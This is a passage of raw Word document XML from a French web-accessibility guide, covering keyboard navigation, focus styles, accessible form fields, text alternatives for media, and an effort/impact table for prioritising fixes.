        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Entrée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3770"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Activer un lien ou un bouton</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>div</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> non activable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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Espace</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="377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Activer un bouton, cocher</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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Comportement absent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Échap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3770"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fermer un menu ou une modale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Aucune fermeture</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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Flèches</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="377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Parcourir un groupe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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Absentes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux fondements de la navigation clavier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Ne jamais supprimer le focus sans remplacement */</w:t>
        <w:br/>
        <w:t>:focus-visible {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  outline: 3px solid #e0a21b;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  outline-offset: 3px;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* Lien d'évitement, indispensable sur les pages à navigation longue */</w:t>
        <w:br/>
        <w:t>.skip-link { position: absolute; left: -999px; }</w:t>
        <w:br/>
        <w:t>.skip-link:focus { left: 1rem; top: 1rem; background: #0f2e4c; color: #fff; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>tabindex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ne doit valoir que </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (rendre focusable dans l'ordre naturel) ou </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (focusable par script). Les valeurs positives créent un ordre parallèle que personne ne maîtrise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>23.4 Formulaires et messages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un formulaire accessible se remplit sans voir l'écran : chaque champ a un nom, une aide éventuelle, et les erreurs sont annoncées.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un champ complet, nommé et décrit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&lt;div class="champ"&gt;</w:t>
        <w:br/>
        <w:t>&lt;label for="courriel"&gt;Adresse électronique &lt;span</w:t>
        <w:br/>
        <w:t xml:space="preserve">    aria-hidden="true"&gt;*&lt;/span&gt;&lt;/label&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;input id="courriel" type="email" name="courriel" required</w:t>
        <w:br/>
        <w:t xml:space="preserve">         autocomplete="email" aria-describedby="courriel-aide"</w:t>
        <w:br/>
        <w:t xml:space="preserve">         aria-invalid="false"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;p id="courriel-aide"&gt;Nous ne partagerons jamais votre adresse.&lt;/p&gt;</w:t>
        <w:br/>
        <w:t>&lt;/div&gt;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caractère obligatoire est annoncé en texte, pas seulement par une couleur.</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L'erreur est liée au champ par </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aria-describedby</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et signalée par </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aria-invalid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w: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focus se déplace sur le message d'erreur ou sur le premier champ fautif.</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valeurs saisies sont conservées après un échec.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Le masquage accessible à ne pas confondre avec `display: none`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Masquer visuellement sans priver les lecteurs d'écran */</w:t>
        <w:br/>
        <w:t>.visually-hidden {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  position: absolute; width: 1px; height: 1px;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  overflow: hidden; clip-path: inset(50%); white-space: nowrap;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>23.5 Images, médias et contenus complexes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les contenus non textuels doivent avoir une alternative équivalente. Pour une image complexe, l'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>alt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> résume et une description développe.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.74 — Six types de contenus et leur alternative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29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Contenu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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Alternative</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="327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Remarque</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2295"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Image informative</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>alt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> descriptif</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Décrire l'information, pas le fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="229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Image décorative</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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alt=""</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Jamais d'attribut absent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2295"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Graphique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>alt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> + tableau de données</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Le détail doit être accessible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="229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Vidéo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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Sous-titres et transcription</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Audio-description si nécessaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2295"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Audio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Transcription</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Indispensable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="229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Tableau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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caption</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>th</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>scope</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Voir chapitre 7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un contenu animé doit pouvoir être mis en pause. Un contenu qui clignote plus de trois fois par seconde peut déclencher une crise d'épilepsie : il doit être évité.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>23.6 Prioriser les corrections</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'accessibilité n'est pas binaire. Toutes les corrections n'ont pas le même impact, et certaines coûtent très peu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.75 — Huit corrections, classées par rapport effort/impact</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426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Correction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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Effort</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="262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Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4261"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>lang</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> sur </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>html</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2131"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Très faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2622"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Élevé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="426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Focus visible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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Très faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="262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Élevé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4261"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>alt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> sur les images</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2131"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2622"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
